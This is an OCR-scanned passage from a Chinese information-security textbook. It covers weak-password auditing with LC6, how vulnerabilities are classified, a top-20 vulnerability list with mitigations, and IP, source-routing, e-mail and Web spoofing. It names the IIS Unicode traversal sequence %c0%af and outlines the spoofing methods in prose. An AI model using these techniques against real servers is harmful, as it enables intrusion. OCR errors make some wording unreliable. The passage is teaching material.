@ 同一 个 域内 的 计算 机 ,需要 系统 管理 员 权 限 。 

Q@ NT 系统 中 的 SAM 文件 。 

@ 监听 本 地 网 络 中 传输 的 密码 散 列表 。 

本 例 选 取 第 1 种 方法 ,如 图 5-10 所 示 。 


图 5-10 LC6 检测 设置 向 导 1 
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(3) 单 击 Next 按钮 ,在 这 里 选择 的 是 检测 密码 的 方法 ,一 共有 4 种 。 

@ 快速 检测 ,这 种 方法 将 LC6 自 带 的 字典 中 的 29 000 个 单词 与 被 审计 的 密码 匹配 。 
这 种 方法 只 需要 数 分 钟 就 能 完成 检查 。 

@ 普通 检测 : 这 种 方法 除了 能 检测 上 述 密码 ,还 可 以 检测 一 些 在 单词 基础 上 进行 简单 
修改 的 密码 。 

@ 强 密码 检测 : 这 种 方法 采用 暴力 破解 的 方式 来 检测 密码 ,通常 检测 时 间 超过 一 天 。 

@ 定制 检测 : 这 种 方法 可 以 根据 需要 灵活 地 进行 配置 ,例如 ,改变 字典 .改变 混合 模式 
的 参数 及 选择 用 于 暴力 破解 的 字符 集 。 

一 般 来 说 ,检测 越 严 格 ,所 花 的 时 间 就 越 长 。 本 例 选 取 第 1 种 方法 ,如 图 5-11 所 示 。 


图 5-11 LC6 检测 设置 向 导 2 
(4) 单 击 Next 按钮 ,在 这 里 选择 的 是 显示 方法 , 按 系 统 默认 即 可 ,如 图 5-12 所 示 。 
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5-12 LC6 检测 设置 向 导 3 
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(5) 单 击 Next 按钮 ,本 框 将 前 面 选择 的 内 容 显 示 出 来 , 单 击 Finish 按钮 ,就 开始 检测 ， 
如 图 5-13 所 示 。 
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图 5-13 LC6 检测 设置 向 导 4 


检测 的 结果 如 图 5-14 所 示 , 从 图 中 可 以 看 出 ,有 些 用 户 的 弱 口 令 被 检测 出 来 了 。 此 时 
可 以 选择 菜单 中 的 Remediate 下 的 Disable Accounts 选项 , 即 可 禁止 该 账号 ; 或 选择 Force 
Password Change 选项 ,强迫 该 用 户 在 下 次 登录 时 修改 密码 。 


图 estake LC5 - [Untitledl] 
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图 5-14 LC6 检测 结果 
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5.3.3 漏洞 攻击 


1. 漏洞 基本 概念 

漏洞 是 指 硬 件 .软件 或 策略 上 的 缺陷 ,从 而 可 使 攻击 者 能 够 在 未 经 授权 的 情况 下 访问 系 
统 。 通 常情 况 下 99. 99% 无 错 的 程序 很 少 会 出 问题 ,利用 那 0. 01% 的 错误 导致 100% 的 
失败 。 

2. 漏洞 的 产生 原因 

通俗 地 讲 ,漏洞 就 是 能 够 被 利用 来 干 * 原 本 以 为 "不 能 干 的 事 。 这 个 缺陷 可 以 是 设计 上 
的 问题 ,也 可 以 是 程序 代码 实现 上 的 问题 。 当 今 的 系统 功能 越 来 越 强 ,体积 也 越 做 越 大 。 上 庞 
大 的 系统 是 由 小 组 完成 的 ,不 能 指望 每 个 人 都 不 犯错 ,也 不 能 指望 无 丝 漏 的 合作 。 加 上 人 的 
惰性 ,不 愿意 仔细 地 进行 系统 的 安全 配置 。 这 样 一 来 ,本 来 比较 安全 的 系统 也 变 得 不 安全 
了 。 例 如 , 冉 认 口令 、 函 数 入 口 不 检查 输出 参数 的 长 度 。 这些 原 因 主 要 表现 在 以 下 3 个 
方面 。 

(1) 编程 人 员 的 人 为 因素 ,在 程序 编写 过 程 ,为 实现 不 可 告 人 的 目的 ,在 程序 代码 的 隐 
蔽 处 保留 后 门 。 

(2) 受 编程 人 员 的 能 力 ` 经 验 和 当时 安全 技术 所 限 , 在 程序 中 难免 会 有 不 足 之 处 , 轻 则 
影响 程序 效率 , 重 则 导致 非 授权 用 户 的 权限 提升 。 

(3) 由 于 硬件 原因 ,使 编程 人 员 无 法 弥补 硬件 的 漏洞 ,从 而 使 硬件 的 问题 通过 软件 表现 
出 来 。 

3. 漏洞 涉及 的 范围 

漏洞 涉及 的 范围 很 广 , 涉 及 网 络 的 各 个 环节 、 各 个 方面 ,包括 路 由 器 、 防 火 墙 .操作 系统 、 
客户 和 服务 器 软件 。 例 如 ,一 台 提 供 网 上 产品 搜索 的 Web 服务 器 ,就 需要 注意 操作 系统 、 数 
据 库 系统 、Web 服务 软件 及 防火 墙 。 

4. 漏洞 的 时 间 效 应 

一 个 系统 从 发 布 的 那 一 天 起 , 随 着 用 户 的 深入 使 用 ,系统 中 存在 的 漏洞 会 被 不 断 暴 露出 
来 ,这 些 早先 被 发 现 的 漏洞 也 会 不 断 被 系统 供应 商 发 布 的 补丁 软件 修补 ,或 在 以 后 发 布 的 新 
版 系统 中 得 以 纠正 。 而 在 新 版 系统 纠正 了 旧版 系统 中 漏洞 的 同时 ,也 会 引入 一 些 新 的 漏洞 
和 错误 。 因 而 随 着 时 间 的 推移 , 旧 的 漏洞 会 不 断 消失 ,新 的 漏洞 会 不 断 出 现 。 漏 洞 问题 也 会 
长 期 存在 。 

5. 漏洞 与 系统 攻击 之 间 的 关系 

漏洞 与 系统 攻击 之 间 存 在 这 样 的 关系 : 系统 攻击 者 往往 是 安全 漏洞 的 发 现 者 和 使 用 
者 ,要 对 于 一 个 系统 进行 攻击 ,如 果 不 能 发 现 和 使 用 系统 中 存在 的 安全 漏洞 是 不 可 能 成 
功 的 。 

6. 漏洞 的 类 型 

(1) 管理 漏洞 。 如 两 台 服 务 器 用 同一 个 用 户 /密码 , 则 入 侵 了 A 服务 器 后 ,B 服务 器 也 
不 能 幸免 。 

(2) 软件 漏洞 。 很 多 程序 只 要 接收 到 一 些 异 常 或 者 超 长 的 数据 和 参数 ,就 会 导致 缓冲 
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(3) 结构 漏洞 。 例 如 ,在 某 个 重要 网 段 由 于 交换 机 、 集 线 器 设置 不 合理 ,造成 黑客 可 以 
监听 网 络 通信 流 的 数据 。 又 如 ,防火 墙 等 安全 产品 部 署 不 合理 ,有 关 安 全 机 制 不 能 发 挥 作 
用 ,麻痹 技术 管理 人 员 而 酿 成 黑客 入 侵 事 故 。 

(4) 信任 漏洞 。 例 如 ,本 系统 过 分 信任 某 个 外 来 合作 伙伴 的 机 器 ,一 旦 这 台 合 作 伙 伴 的 
机 器 被 黑客 人 侵 , 则 本 系统 的 安全 受 严重 威胁 。 

7. 漏洞 的 分 类 

对 一 个 特定 程序 的 安全 漏洞 可 以 从 多 方面 进行 分 类 。 

(1) 从 用 户 群 体 分 类 。 大 众 类 软件 的 漏洞 ,如 Windows 的 漏洞 .IE 的 漏洞 等 。 专 用 软 
件 的 漏洞 ,如 Oracle 漏洞 .Apache 漏洞 等 。 

(2) 从 作用 范围 角度 分 类 。 远 程 漏洞 ,攻击 者 可 以 利用 并 直接 通过 网 络 发 起 攻击 的 漏 
洞 。 这 类 漏洞 危害 极 大 ,攻击 者 能 随心 所 欲 地 通过 此 漏洞 操作 他 人 的 计算 机 ,并 且 此 类 漏洞 
很 容易 导致 蠕虫 攻击 。 本 地 漏洞 ,攻击 者 必须 在 本 机 拥有 访问 权限 前 提 下 才能 发 起 攻击 的 
漏洞 。 比 较 典 型 的 是 本 地 权限 提升 漏洞 ,这 类 漏洞 在 UNIX 系统 中 广泛 存在 ,能 让 普通 用 
户 获得 最 高 管理 员 权 限 。 

(3) 从 触发 条 件 上 分 类 。 主 动 触 发 漏洞 ,攻击 者 可 以 主动 利用 该 漏洞 进行 攻击 ,如 直接 
访问 他 人 计算 机 。 被 动 触 发 漏洞 ,必须 要 计算 机 的 操作 人 员 配 合 才能 进行 攻击 利用 的 漏洞 。 
例如 ,攻击 者 给 管理 员 发 一 封 邮件 , 带 了 一 个 特殊 的 JPG 图 片 文件 ,如 果 管 理 员 打开 图 片 文 
件 就 会 导致 看 图 软件 的 某 个 漏洞 被 触发 ,从 而 系统 被 攻击 ,但 如 果 管 理 员 不 看 这 个 图 片 则 不 
会 受 攻击 。 

(4) 从 操作 角度 分 类 。 

文件 操作 类 型 : 主要 为 操作 的 目标 文件 路 径 可 被 控制 (如 通过 参数 、 配 置 文件 .环境 变 
量 、 符 号 链接 等 ) ,这样 就 可 能 导致 下 面 两 个 问题 。 

一 是 写 人 内 容 可 被 控制 ,从 而 可 伪造 文件 内 容 , 导 致 权限 提升 或 直接 修改 重要 数据 (如 
修改 存 贷 数据 ) 。 这 类 漏洞 有 很 多 ,如 历史 上 Oracle TNS LOG 文件 可 指定 漏洞 ,导致 任何 
人 可 控制 运行 Oracle 服务 的 计算 机 。 

二 是 内 容 信息 可 被 输出 ,包含 内 容 被 打印 到 屏幕 .记录 到 可 读 的 日 志文 件 . 产 生 可 被 用 
户 读 的 core 文件 等 。 这 类 漏洞 在 历史 上 UNIX 系统 中 的 crontab 子 系统 中 出 现 过 很 多 次 ， 
普通 用 户 能 读 受 保护 的 shadow 文件 。 

内 存 覆 盖 : 主要 为 内 存单 元 可 指定 , 写 入 内 容 可 指定 ,这 样 就 能 执行 攻击 者 想 执 行 的 代 
码 ( 缓 冲 区 溢出 、 格 式 串 漏洞 .Ptrace 漏洞 .历史 上 Windows 2000 的 硬件 调试 寄存 器 用 户 可 
写 漏洞 ) 或 直接 修改 内 存 中 的 机 密 数 据 。 

逻辑 错误 : 这 类 漏洞 广泛 存在 :但 很 少 有 范式 ,所 以 难以 察觉 ,可 细 分 为 以 下 几 种 。 

QO@ 条 件 竞争 漏洞 : 通常 为 设计 问题 ,典型 的 有 Ptrace 漏洞 .广泛 存在 的 文件 操作 时 序 


竞争 。 
@ 策略 错误 : 通常 为 设计 问题 ,如 历史 上 FreeBSD 的 Smart IO 漏洞 。 
@ 算法 问题 : 通常 为 设计 问题 或 代码 实现 问题 ,如 历史 上 微软 的 Windows 95/98 的 共 
享 口令 可 轻易 获取 漏洞 。 

@ 设计 的 不 完善 : 如 TCP/IP 协议 中 的 三 步 握手 导致 了 SYN Flood 拒绝 服务 攻击 。 


Et 


120 信息 安全 与 技术 (第 2 版 ) 


@ 实现 中 的 错误 : 通常 为 设计 没有 问题 ,但 编码 人 员 出 现 了 逻辑 错误 ,如 历史 上 博彩 
系统 的 伪 随 机 算法 实现 问题 。 外 部 命令 执行 问题 ,典型 的 有 外 部 命令 可 被 控制 (通过 
PATH 变量 ,输入 中 的 SHELL 特殊 字符 等 ) 和 SQL 注入 问题 。 

(5) 从 时 序 上 分 类 。 

已 发 现 很 久 的 漏洞 : 厂商 已 经 发 布 补丁 或 修补 方法 ,很 多 人 都 已 经 知道 。 这 类 漏洞 通 
常 很 多 人 已 经 进行 了 修补 ,宏观 上 看 危害 比较 小 。 

刚 发 现 的 漏洞 : 厂商 刚 发 补丁 或 修补 方法 ,知道 的 人 还 不 多 。 相 对 于 上 一 种 漏洞 其 危 
害 性 较 大 ,如 果 此 时 出 现 了 蠕虫 或 傻瓜 化 的 利用 程序 ,那么 会 导致 大 批 系统 受到 攻击 。 

0day 漏洞 : 还 没有 公开 的 漏洞 ,在 私下 交易 中 的 。 这 类 漏洞 通常 对 大 众 不 会 有 什么 影 
响 ,但 会 导致 攻击 者 瞄准 的 目标 受到 精确 攻击 ,危害 也 是 非常 之 大 。 

8. 已 发 布 的 漏洞 

目前 已 经 发 布 的 20 个 最 危险 的 三 类 安全 漏洞 有 : 影响 所 有 系统 的 7 个 漏洞 (G1 一 
G7); 影响 Windows 系统 的 6 个 漏洞 C(W1 一 W6); 影响 UNIX 系统 的 7 个 漏洞 CU1 一 U7) 。 

(1) 操作 系统 和 应 用 软件 的 默认 安装 (G1)。 软 件 开发 商 的 逻辑 是 最 好 先 激活 还 不 需 
要 的 功能 ,而 不 是 让 用 户 在 需要 时 再 去 安装 额外 的 组 件 。 这 种 方法 尽管 对 用 户 很 方便 ,但 却 
产生 了 很 多 危险 的 安全 漏洞 ,因为 用 户 不 会 主动 地 给 他 们 不 使 用 的 软件 组 件 打 补 丁 ,而且 很 
多 用 户 根本 不 知道 实际 安装 了 什么 ,很 多 系统 中 留 有 安全 漏洞 就 是 因为 用 户 根 本 不 知道 安 
装 了 这 些 程序 。 

大 多 数 操作 系统 和 应 用 程序 都 采取 这 样 的 方式 。 应 该 对 任何 连 到 Internet 上 的 系统 进 
行 端口 扫描 和 漏洞 扫描 。 印 载 不 必要 的 软件 , 关 掉 不 需要 的 服务 和 额外 的 端口 。 但 是 ,这 是 
一 个 枯燥 而 且 耗 费时 间 的 工作 。 

(2) 没有 口令 或 使 用 弱 口令 的 账号 (G2)。 

易 猜 的 口令 或 默认 口令 是 个 严重 的 问题 ,更 严重 的 是 有 的 账号 根本 没有 口令 。 应 进行 
以 下 操作 。 

Q@ 审计 系统 上 的 账号 ,建立 一 个 使 用 者 列表 。 

@ 制定 管理 制度 ,规范 增加 账号 的 操作 ,及 时 移 走 不 再 使 用 的 账号 。 

@ 经 常 检查 确认 有 没有 增加 新 的 账号 ,不 使 用 的 账号 是 否 已 被 删除 。 当 雇员 或 承包 人 
离开 公司 时 ,或 当 账号 不 再 需要 时 ,应 有 严格 的 制度 保证 删除 这 些 账 号 。 

@ 对 所 有 的 账号 运行 口令 破解 工具 ,以 寻找 弱 口 令 或 没有 口令 的 账号 。 

(3) 没有 备份 或 者 备份 不 完整 (G3)。 从 事故 中 恢复 要 求 及 时 的 备份 和 可 靠 的 数据 存 
储 方式 。 应 列 出 一 份 紧要 系统 的 列表 ,制定 备份 方式 和 策略 。 重 要 问题 如 下 。 

@ 系统 是 否 有 备份 ? 

@ 备份 间隔 是 可 接受 的 吗 ? 

@ 系统 是 按 规定 进行 备份 的 吗 ? 

@ 是 否 确认 备份 介质 正确 的 保存 了 数据 ? 

@ 备份 介质 是 否 在 室内 得 到 了 正确 的 保护 ? 

@) 是 否 在 另 一 处 还 有 操作 系统 和 存储 设施 的 备份 ? 〈 包 括 必 要 的 license key) 

@ 存储 过 程 是 否 被 测试 及 确认 ? 

(4) 大 量 打开 的 端口 (G4)。 合 法 的 用 户 和 攻击 者 都 通过 开放 端口 连接 系统 。 端 口 开 
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得 越 多 ,进入 系统 的 途径 就 越 多 。 

netstat 命令 可 以 在 本 地 运行 以 判断 哪些 端口 是 打开 的 ,但 更 保险 的 方法 是 对 自己 的 系 
统 进行 外 部 的 端口 扫描 。 一 旦 确定 了 哪些 端口 是 打开 的 , 接 下 来 的 任务 是 确定 所 必须 打开 
的 端口 的 最 小 集合 ,然后 关闭 其 他 端口 ,也 就 是 找到 这 些 端口 对 应 的 服务 ,并 关闭 / 移 走 
它们 。 

(5) 没有 过 滤 地 址 不 正确 的 包 (G5)。IP 地 址 欺诈 ,如 smurf 攻击 。 对 流 进 和 流出 自己 
网 络 的 数据 进行 过 滤 。 

任何 进入 用 户 网 络 的 数据 包 不 能 把 用 户 网 络 内 部 的 地 址 作为 源 地 址 ; 必须 把 用 户 网 络 
内 部 的 地 址 作为 目的 地 址 。 任 何 离开 用 户 网 络 的 数据 包 必 须 把 用 户 网 络 内 部 的 地 址 作为 源 
地 址 ; 不 能 把 用 户 网 络 内 部 的 地 址 作为 目的 地 址 。 

任何 进入 或 离开 用 户 网 络 的 数据 包 不 能 把 一 个 私有 地 址 (private address) 或 在 
RFC1918 中 列 出 的 属于 保留 空间 (包括 10. x. x. x/8、172. 16. x. x/12 或 192. 168. x. x/16 和 
网 络 回 送 地 址 127. 0. 0.0/8. ) 的 地 址 作为 源 地 址 或 目的 地 址 。 

(6) 不 存在 或 不 完整 的 日 志 (G6)。 安 全 领域 的 一 句 名 言 是 :“ 预 防 是 理想 的 ,但 检测 是 
必需 的 ”一 旦 被 攻击 ,没有 日 志 , 会 很 难 发 现 攻击 者 都 做 了 什么 。 在 所 有 重要 的 系统 上 应 定 
期 做 日 志 , 而 且 日 志 应 被 定期 保存 和 备份 ,因为 不 知 何 时 会 需要 它 。 

查看 每 一 个 主要 系统 的 日 志 , 如 果 没 有 日 志 或 它们 不 能 确定 被 保存 了 下 来 ,是 易 被 攻击 
的 。 所 有 系统 都 应 在 本 地 记录 日 志 , 并 把 日 志 发 到 一 个 远 端 系统 保存 。 这 提供 了 元 余 和 一 
个 额外 的 安全 保护 层 。 无 论 何 时 ,用 一 次 性 写 入 的 媒质 记录 日 志 。 

(7) 易 被 攻击 的 CGI 程序 (G7)。 大 多 数 的 Web 服务 器 都 支持 CGI 程序 。 

@ 从 你 的 Web 服务 器 上 移 走 所 有 CGI 示范 程序 。 

@ 审核 剩余 的 CGI 脚本 , 移 走 不 安全 的 部 分 。 

@ 保证 所 有 的 CGI 程序 员 在 编写 程序 时 ,都 进行 输入 缓冲 区 长 度 检查 。 

@ 为 所 有 不 能 除去 的 漏洞 打上 补丁 。 

GO 保证 自己 的 CGI bin 目录 下 不 包括 任何 的 编译 器 或 解释 器 。 

@) 从 CGI bin 目录 下 删除 “view-source” 脚 本 。 

@ 不 要 以 administrator 或 root 权限 运行 自己 的 Web 服务 器 。 大 多 数 的 Web 服务 器 
可 以 配置 成 较 低 的 权限 ,如 “nobody. ”。 

不 要 在 不 需要 CGI 的 Web 服务 器 上 配置 CGI 支持 。 

(8) Unicode 漏洞 (W1)。 无 论 何 种 平台 , 何 种 程序 , 何 种 语言 , Unicode 为 每 一 个 字符 
提供 了 一 个 独一无二 的 序号 。 通 过 向 IIS 服务 器 发 出 一 个 包括 非法 Unicode UTF-8 序列 的 
URL ,攻击 者 可 以 迫使 服务 器 逐 字 “进入 或 退出 ”目录 并 执行 任意 程序 (script- 脚 本 ) ,这 种 攻 
击 被 称 为 目录 转换 攻击 。 

Unicode 用 %2f 和 %5c 分 别 代 表 / 和 \, 但 也 可 以 用 所 谓 的 “ 超 长 ”序列 来 代表 这 些 字 
符 。“ 超 长 "序列 是 非法 的 Unicode 标识 符 ,它们 比 实际 代表 这 些 字符 的 序列 要 长 。/ 和 \ 均 
可 以 用 一 个 字 节 来 表示 。 超 长 的 表示 法 ,例如 ,用 %c0%af 代表 /用 了 两 个 字 节 。IIS 不 对 超 
长 序列 进行 检查 。 这 样 在 URL 中 加 入 一 个 超 长 的 Unicode 序列 ,就 可 以 绕 过 Microsoft 的 
安全 检查 。 如 果 你 在 运行 一 个 未 打 补 丁 的 IIS, 那 么 你 是 易 受 到 攻击 的 。 

(9) ISAPI 缓冲 区 扩展 溢出 (W2)。 安 装 IIS 后 ,就 自动 安装 了 多 个 ISAPI extensions。 
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ISAPI, 代 表 Internet Services Application Programming Interface, 人 允许 开发 人 员 使 用 DLL 
扩展 IIS 服务 器 的 性 能 。 一 些 动态 链接 库 ,如 idq. dll, 有 编程 错误 ,使 得 它们 做 不 正确 的 边 
界 检查 ,特别 是 它们 不 阻塞 超 长 字符 串 。 攻 击 者 可 以 利用 这 一 点 向 DLL 发 送 数据 ,造成 缓 
冲 区 溢出 ,进而 控制 IIS 服务 器 。 

安装 最 新 的 Microsoft 的 补丁 。 同 时 ,管理 员 应 检查 并 取消 所 有 不 需要 的 ISAPI 扩展 
经 常 检查 这 些 扩 展 没 有 被 恢复 。 该 漏洞 不 影响 Windows XP。 

记 住 最 小 权限 规则 ,系统 应 运行 系统 正常 工作 所 需 的 最 少 服务 。 

(10) IIS RDS 的 使 用 (Microsoft Remote Data Services)(W3)。 黑 客 可 以 利用 IIS's 
Remote Data Services (RDS) 中 的 漏洞 以 Administrator 权限 在 远 端 运行 命令 。 如 果 运 行 一 
个 未 打 补 丁 的 系统 ,是 易 被 攻击 的 。 

(11) NetBIOS 一 一 未 保护 的 Windows 网 络 共享 (W4)。Server Message Block (SMB) 
协议 ,也 称 为 Common Internet File System (CIFS) ,允许 网 络 间 的 文件 共享 。 不 正确 的 配 
置 可 能 会 导致 系统 文件 的 暴露 ,或 给 予 黑 客 完全 的 系统 访问 权 。 

在 Windows 的 主机 上 允许 文件 共享 使 得 它们 容易 受到 信息 窍 贼 和 某 种 快速 移动 的 病 
毒 的 攻击 。 

a 在 共享 数据 时 ,确保 只 共享 所 需 目 录 。 

@ 为 增加 安全 性 ,只 对 特定 IP 地 址 进行 共享 ,因为 DNS 名 可 以 欺诈 。 

@ 对 Windows 系统 (NT、2000) ,只 允许 特定 用 户 访问 共享 文件 夹 。 

@ 对 Windows 系统 ,禁止 通过 “ 空 对 话 ” 连 接 对 用 户 、 组 、 系 统 配 置 和 注册 密 钥 进 行 匿 
名 列举 。 在 W5 中 有 更 详尽 的 信息 。 

@ 对 主机 或 路 由 器 上 的 NetBIOS 会 话 服务 (tcp 139)，Microsoft CIFS (TCP/UDP 
445) 禁 止 不 绑 定 的 连接 。 

G@ 考虑 在 独立 或 彼此 不 信任 的 环境 下 ,在 连接 Internet 的 主机 上 部 署 Restrict 
Anonymous registry key。 

(12) 通过 空 对 话 连 接 造 成 的 信息 泄露 (W5)。 空 对 话 连 接 (null session) ,也 称 为 匿名 
登录 ,是 一 种 允许 匿名 用 户 获取 信息 (如 用 户 名 或 共享 文件 ) ,或 无 须 认证 进行 连接 的 机 制 。 
explorer. exe 利用 它 来 列举 远程 服务 器 上 的 共享 文件 。 在 Windows NT 和 Windows 2000 
系统 下 ,许多 本 地 服务 是 在 System 账号 下 运行 的 ,又 称 为 Windows 2000 的 LocalSystem。 
很 多 操作 系统 都 使 用 System 账号 。 当 一 台 主 机 需要 从 另 一 台 主 机 上 获取 系统 信息 时 ， 
System 账号 会 为 男 一 台 主 机 建立 一 个 空 对 话 。System 账号 实际 拥有 无 限 的 权利 ,而 且 没 
有 密码 ,所 以 用 户 不 能 以 System 的 方式 登录 。 

System 有 时 需要 获取 其 他 主机 上 的 一 些 信 息 , 例 如 ,可 获取 的 共享 资源 和 用 户 名 等 典 
型 的 网 上 邻居 功能 。 由 于 它 不 能 以 用 户 名 和 口令 进入 ,因此 它 使 用 空 对话 连 接 进入 ,不幸 的 
是 攻击 者 也 可 以 相同 的 方式 进入 。 

(13) Weak hashing in SAM (LM hash)(W6)。 尽 管 Windows 的 大 多 数 用 户 不 需要 
LAN Manager 的 支持 ,微软 还 是 在 Windows NT 和 Windows 2000 系统 里 默认 安装 了 
LAN Manager 口令 散 列 。 由 于 LAN Manager 使 用 的 加 密 机 制 比 微软 现在 的 方法 脆弱 ， 
LAN Manager 的 口令 能 在 很 短 的 时 间 内 被 破解 。LAN Manager 散 列 的 主要 脆弱 性 在 于 : 
长 的 口令 被 截 成 14 个 字符 ; 短 的 口令 被 填补 空格 变 成 14 个 字符 ; 口令 中 所 有 的 字符 被 转 
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换 成 大 写 ; 口令 被 分 割 成 两 个 7 个 字符 的 片断 ; LAN Manager 容易 被 侦 听 口令 散 列 。 侦 听 
可 以 为 攻击 者 提供 用 户 的 口令 。 


5.3.4 欺骗 攻击 


网 络 欺骗 技术 是 利用 TCP/IP 协议 本 身 的 缺陷 对 TCP/IP 网 络 进行 攻击 的 一 种 复杂 的 
技术 。 主 要 的 方式 有 IP 欺骗 ,ARP 欺骗 ,DNS 欺骗 、 Web 欺骗 .E-mail 欺骗 .Cookie 欺骗 、 
源 路 由 欺骗 等 。 还 有 一 些 非 技术 类 欺骗 ,这 些 类 型 的 攻击 是 把 精力 集中 在 攻击 的 人 力 因素 
上 , 它 需 要 通过 社会 工程 技术 来 实现 。 

1. IP 欺骗 

一 般 情 况 下 ,路 由 器 在 转发 报 文 的 时 候 , 只 根据 报 文 的 目的 地 址 查 路 由 表 , 而 不 管 报 文 
的 源 地 址 是 什么 ,因此 ,这 样 就 可 能 面临 一 种 危险 : 如 果 一 个 攻击 者 向 一 台 目 标 计算 机 发 出 
一 个 报 文 , 而 把 报 文 的 源 地 址 填写 为 第 三 方 的 一 个 IP 地 址 ,这 样 这 个 报 文 在 到 达 目 标 计算 
机 后 ,目标 计算 机 便 可 能 向 毫 无 知觉 的 第 三 方 计算 机 回应 。 这 便 是 所 谓 的 IP 地 址 欺骗 攻 
击 。 这 是 非常 低 等 级 的 技术 ,因为 所 有 的 应 答 都 回 到 了 被 盗用 了 地 址 的 机 器 上 ,而 不 是 攻击 
者 的 机 器 。 这 被 称 为 盲目 飞行 攻击 (flying blind attack) ,或 者 称 为 单 向 攻击 (one-way 
attack) 。 这 种 攻击 虽 有 一 些 限 制 , 但 就 某 一 特定 类 型 的 拒绝 服务 攻击 而 言 是 非常 有 效 的 ， 
而 且 地址 欺骗 会 让 人 们 更 难以 找到 攻击 者 的 根源 。 比 较 著 名 的 SQL Server 蠕虫 病毒 就 是 
采用 了 这 种 原理 。 该 病毒 (可 以 理解 为 一 个 攻击 者 ) 向 一 台 和 运行 SQL Server 解析 服务 的 服 
务 器 发 送 一 个 解析 服务 的 UDP 报 文 ,该 报 文 的 源 地 址 填写 为 男 外 一 台 运 行 SQL Server 解 
析 程 序 (SQL Server 2000 以 后 版 本 ) 的 服务 器 ,这 样 由 于 SQL Server 解析 服务 的 一 个 漏洞 
就 可 能 使 得 该 UDP 报 文 在 这 两 台 服 务 器 之 间 往 复 ,最 终 导致 服务 器 或 网 络 瘫痪 。 

2. IP 源 路 由 欺骗 

IP 报 文 首部 的 可 选项 中 有 “ 源 站 选 路 ”, 可 以 指定 到 达 目 的 站 点 的 路 由 。 正 常情 况 下 ， 
目的 主机 如 果 有 应 答 或 其 他 信息 返回 源 站 ,就 可 以 直接 将 该 路 由 反 向 运用 作为 应 答 的 回复 
路 径 。 

例如 ,主机 A( 假 设 全 地 址 是 192. 168. 100. 11) 是 主机 B( 假 设 IP 地 址 为 192. 168. 100. 1) 
的 被 信任 主机 ,主机 X 想 冒 充 主 机 A 从 主机 B 获得 某 些 服务 。 首 先 , 攻 击 者 修改 距离 X 最 
近 的 路 由 器 G2 ,使 用 到 达 此 路 由 器 且 包 含 目 的 地 址 192. 168. 100. 1 的 数据 包 以 主机 X 所 在 
的 网 络 为 目的 地 ; 然后 ,攻击 者 X 利 用 全 欺骗 (把 数据 包 的 源 地 址 改 为 192. 168. 100. 11) 向 主 
机 B 发 送 带 有 源 路 由 选项 (指定 最 近 的 G2) 的 数据 包 。 当 B 回 送 数据 包 时 , 按 收 到 数据 包 
的 源 路 由 选项 反 转 使 用 源 路 由 ,传送 到 被 更 改过 的 路 由 器 G2。 由 于 G2 路 由 表 已 被 修改 ， 
收 到 B 的 数据 包 时 ,G2 根据 路 由 表 把 数据 包 发 送 到 X 所 在 的 网 络 ,X 可 在 其 局 域 网 内 较 方 
便 地 进行 侦 听 ,收取 此 数据 包 。 

防范 IP 源 路 由 欺骗 的 好 方法 主要 有 以 下 两 个 。 

Q@ 配置 好 路 由 器 ,使 它 抛弃 那些 由 外 部 网 进来 的 .声称 是 内 部 主机 的 报 文 。 

@ 关闭 主机 和 路 由 器 上 的 源 路 由 功能 。 

3. E-mail 欺骗 

E-mail 的 发 送 方 地 址 的 欺骗 。 例 如 ,E-mail 看 上 去 是 来 自 A, 但 事实 上 A 没有 发 信 , 是 
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冒充 A 的 人 发 的 信 。 

攻击 者 使 用 电子 邮件 欺骗 有 两 个 目的 : 隐藏 自己 的 身份 ; 冒充 别人 骗取 敏感 信息 。 

E-mail 欺骗 攻击 采用 的 一 种 方法 是 相似 的 电子 邮件 地 址 。 

使 用 这 种 类 型 的 攻击 ,攻击 者 搜集 到 一 些 企业 的 老板 或 者 高 管 的 信息 。 用 这 些 信息 注 
册 一 些 E-mail 账号 ,然后 在 这 些 E-mail 的 别名 字段 填 入 这 些 管 理 者 的 名 字 。 大 家 知道 , 别 
名 字段 是 显示 在 用 户 的 邮件 客户 的 发 件 人 字段 中 。 因 为 邮件 地 址 似乎 是 正确 的 ,所 以 收 信 
人 很 可 能 会 回复 它 ,这 样 攻击 者 就 会 得 到 想 要 的 信息 。 

邮件 欺骗 攻击 采用 的 另 一 个 更 复杂 的 方法 是 远程 登录 到 邮件 服务 器 的 端口 25。 因 为 
邮件 服务 器 使 用 25 端口 在 互联 网 上 发 送 邮件 。 当 攻击 者 想 发 送 给 用 户 信 息 时 ,他 先 写 一 个 
信息 ,然后 发 送 。 接 下 来 他 的 邮件 服务 器 与 用 户 的 邮件 服务 器 联系 ,在 端口 25 发 送信 息 , 转 
移 信息 。 用 户 的 邮件 服务 器 然后 把 这 个 信息 发 送 给 用 户 。 

因为 邮件 服务 器 使 用 端口 25 发 送信 息 , 攻 击 者 也 会 连接 到 25, 装 作 是 一 台 邮 件 服务 
器 ,然后 写 一 个 信息 。 有 时 攻击 者 会 使 用 端口 扫描 来 判断 哪个 端口 25 是 开放 的 ,以 此 找到 
邮件 服务 器 的 IP 地 址 。 

越 来 越 多 的 系统 管理 员 正 在 意识 到 攻击 者 在 使 用 他 们 的 系统 进行 欺骗 ,所 以 更 新 版 的 
邮件 服务 器 不 允许 邮件 转发 ,并 且 一 个 邮件 服务 器 应 该 只 发 送 或 者 接收 一 个 指定 域名 或 者 
公司 的 邮件 。 

4. Web 欺骗 

越 来 越 多 的 电子 商务 开始 使 用 Internet。 一 些 基 本 的 网 站 欺骗 是 攻击 者 假冒 一 些 网 站 
盗 取 信息。 攻击 者 特别 设计 并 注册 一 个 完整 的 令 人 信服 的 网 站 ,但 实际 上 它 却 是 一 个 虚假 
的 复制 ,是 与 将 要 攻击 的 网 站 非常 类 似 的 有 欺骗 性 的 站 点 。 攻 击 者 控制 这 个 虚假 的 Web 站 
点 ,受害 者 浏览 器 和 Web 之 间 所 有 网 络 通信 完全 被 攻击 者 截获 。 当 一 个 用 户 浏 览 了 这 个 假 
冒 地 址 ,并 与 站 点 作 了 一 些 信息 交流 ,如 填写 了 一 些 表单 ,站 点 会 给 出 一 些 响应 的 提示 和 回 
答 , 同 时 记录 下 用 户 的 信息 ,甚至 给 这 个 用 户 一 个 Cookie, 以 便 能 随时 跟踪 这 个 用 户 。 典 型 
的 例子 是 假冒 金融 机 构 ,偷盗 客户 的 信用 卡 信息 等 。 

另 一 种 欺骗 方式 是 URL 重 写 。 利 用 URL 重 写 ,攻击 者 能 够 把 网 络 流量 转 到 攻击 者 控 
